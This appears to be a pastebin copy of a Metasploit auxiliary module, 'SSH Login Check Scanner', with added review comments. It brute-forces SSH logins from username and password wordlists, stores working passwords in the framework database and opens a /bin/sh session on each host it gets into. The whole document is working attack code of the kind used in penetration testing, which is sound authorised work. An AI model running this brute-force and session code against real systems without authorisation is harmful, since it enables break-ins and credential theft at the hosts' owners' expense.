
Untitled

a guest
Mar 10th, 2018
  1. ##
  2. # This module requires Metasploit: https://metasploit.com/download
  3. # Current source: https://github.com/rapid7/metasploit-framework
  4. ##
  5.  
  6. require 'net/ssh'
  7. require 'net/ssh/command_stream'
  8. require 'metasploit/framework/login_scanner/ssh'
  9. require 'metasploit/framework/credential_collection'
  10.  
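  # Auxiliary scanner that tries SSH username/password pairs against each
  # target host and reports the outcome of every attempt.
  #
  # Side effects visible in this file:
  # * a working pair is stored through create_credential and
  #   create_credential_login with private_type :password, so the workspace
  #   database ends up holding the password itself;
  # * every other attempt is recorded through invalidate_login;
  # * a working login is wrapped in a '/bin/sh' command stream and registered
  #   as a framework session.
  class MetasploitModule < Msf::Auxiliary
    include Msf::Auxiliary::AuthBrute
    include Msf::Auxiliary::Report
    include Msf::Auxiliary::CommandShell

    include Msf::Auxiliary::Scanner

    # Declares the module metadata and its options: RPORT (default 22) plus the
    # advanced options Proxies, SSH_DEBUG and SSH_TIMEOUT.
    def initialize
      super(
        'Name' => 'SSH Login Check Scanner',
        'Description' => %q{
          This module will test ssh logins on a range of machines and
          report successful logins. If you have loaded a database plugin
          and connected to a database this module will record successful
          logins and hosts so you can track your access.
        },
        'Author' => ['todb'],
        'References' =>
          [
            [ 'CVE', '1999-0502'] # Weak password
          ],
        'License' => MSF_LICENSE,
        'DefaultOptions' => {'VERBOSE' => false} # Disable annoying connect errors
      )

      register_options(
        [
          Opt::RPORT(22)
        ], self.class
      )

      register_advanced_options(
        [
          Opt::Proxies,
          OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
          OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
        ]
      )
    end

    # @return the configured target port, read from the RPORT datastore option
    def rport
      datastore['RPORT']
    end

    # Turns an authenticated SSH connection into a framework session.
    #
    # @param result the login result; its credential and proof are read here
    # @param ssh_socket the authenticated SSH connection, or nil
    # @return the object returned by start_session, or nil when ssh_socket is nil
    def session_setup(result, ssh_socket)
      return unless ssh_socket

      # Create a new session
      conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true)

      # The session keeps only the pair that worked; the wordlist options are
      # blanked out for it.
      merge_me = {
        'USERPASS_FILE' => nil,
        'USER_FILE' => nil,
        'PASS_FILE' => nil,
        'USERNAME' => result.credential.public,
        'PASSWORD' => result.credential.private
      }
      info = "#{proto_from_fullname} #{result.credential} (#{@ip}:#{rport})"
      s = start_session(self, info, merge_me, false, conn.lsock)
      # NOTE(review): presumably dropped from the module's socket list so that
      # module cleanup does not close the socket the session now uses - confirm.
      self.sockets.delete(ssh_socket.transport.socket)

      # Set the session platform from the first pattern that matches the proof.
      # The order matters: only the first matching branch is applied.
      case result.proof
      when /Linux/
        s.platform = "linux"
      when /Darwin/
        s.platform = "osx"
      when /SunOS/
        s.platform = "solaris"
      when /BSD/
        s.platform = "bsd"
      when /HP-UX/
        s.platform = "hpux"
      when /AIX/
        s.platform = "aix"
      when /Win32|Windows/
        s.platform = "windows"
      when /Unknown command or computer name/
        s.platform = "cisco-ios"
      end

      s
    end

    # Runs the login scan against one host and records each attempt.
    #
    # @param ip the target address handed in by the scanner mixin
    def run_host(ip)
      @ip = ip

      cred_collection = Metasploit::Framework::CredentialCollection.new(
        blank_passwords: datastore['BLANK_PASSWORDS'],
        pass_file: datastore['PASS_FILE'],
        password: datastore['PASSWORD'],
        user_file: datastore['USER_FILE'],
        userpass_file: datastore['USERPASS_FILE'],
        username: datastore['USERNAME'],
        user_as_pass: datastore['USER_AS_PASS'],
      )

      cred_collection = prepend_db_passwords(cred_collection)

      scanner = Metasploit::Framework::LoginScanner::SSH.new(
        host: ip,
        port: rport,
        cred_details: cred_collection,
        proxies: datastore['Proxies'],
        stop_on_success: datastore['STOP_ON_SUCCESS'],
        bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
        connection_timeout: datastore['SSH_TIMEOUT'],
        framework: framework,
        framework_module: self,
      )

      scanner.verbosity = :debug if datastore['SSH_DEBUG']

      scanner.scan! do |result|
        credential_data = result.to_h
        credential_data.merge!(
          module_fullname: self.fullname,
          workspace_id: myworkspace_id
        )
        case result.status
        when Metasploit::Model::Login::Status::SUCCESSFUL
          print_brute level: :good, ip: ip, msg: "Success: '#{result.credential}' '#{printable_proof(result.proof)}'"
          credential_data[:private_type] = :password
          credential_core = create_credential(credential_data)
          credential_data[:core] = credential_core
          create_credential_login(credential_data)
          session_setup(result, scanner.ssh_socket)
          :next_user
        when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
          # The proof is filtered here exactly as on the success path; it was
          # previously printed raw. NOTE(review): it may carry text that
          # originated from the remote host - confirm against the scanner.
          vprint_brute level: :verror, ip: ip, msg: "Could not connect: #{printable_proof(result.proof)}"
          close_ssh_socket(scanner)
          invalidate_login(credential_data)
          :abort
        when Metasploit::Model::Login::Status::INCORRECT
          vprint_brute level: :verror, ip: ip, msg: "Failed: '#{result.credential}'"
          invalidate_login(credential_data)
          close_ssh_socket(scanner)
        else
          invalidate_login(credential_data)
          close_ssh_socket(scanner)
        end
      end
    end

    private

    # Flattens a proof value to one printable line by replacing CR, LF, ESC,
    # backspace and BEL with spaces, so text taken from a scan result cannot
    # split console/log lines or emit terminal escape sequences.
    #
    # @param proof any object; it is converted with to_s first
    # @return [String] the filtered text
    def printable_proof(proof)
      proof.to_s.gsub(/[\r\n\e\b\a]/, ' ')
    end

    # Closes the scanner's SSH connection when one exists and is still open.
    #
    # @param scanner the login scanner whose ssh_socket should be closed
    def close_ssh_socket(scanner)
      sock = scanner.ssh_socket
      sock.close if sock && !sock.closed?
    end
  end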